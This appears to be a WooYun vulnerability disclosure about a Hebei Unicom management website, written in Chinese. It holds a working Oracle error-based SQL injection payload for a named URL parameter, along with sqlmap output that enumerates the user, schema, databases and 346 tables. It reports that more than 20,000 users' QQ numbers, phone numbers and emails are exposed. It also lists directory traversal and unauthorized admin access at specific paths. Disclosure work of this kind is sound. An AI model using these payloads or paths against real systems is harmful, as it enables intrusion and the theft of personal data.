WooYun.org

http://b.ltyg.cn/BManage/SSO/DoLogin.aspx?check=1 河北联通综合信息管理系统
1、sql注入
http://b.ltyg.cn/EcManage/request/ShowLeaveword.aspx?ids=1 ids参数没有过滤
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: GET
Parameter: ids
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: ids=1) AND 7504=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(108)||CHR(103)||CHR(97)||CHR(58)||(SELECT (CASE WHEN (7504=7504) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(112)||CHR(101)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (6419=6419
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ids
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: ids=1) AND 7504=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(108)||CHR(103)||CHR(97)||CHR(58)||(SELECT (CASE WHEN (7504=7504) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(112)||CHR(101)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (6419=6419
---
current user: 'COMM'
current schema (equivalent to database on Oracle): 'COMM'
available databases [8]:
[*] COMM
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WMSYS
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ids
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: ids=1) AND 7504=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(108)||CHR(103)||CHR(97)||CHR(58)||(SELECT (CASE WHEN (7504=7504) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(112)||CHR(101)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (6419=6419
---
Database: COMM
[346 tables]
345张表，2w+用户数，字段里面涉及qq号码、手机号码、邮箱地址
部分数据

2、目录遍历
http://b.ltyg.cn/BManage/SSO/

3、未授权访问
http://b.ltyg.cn/BManage/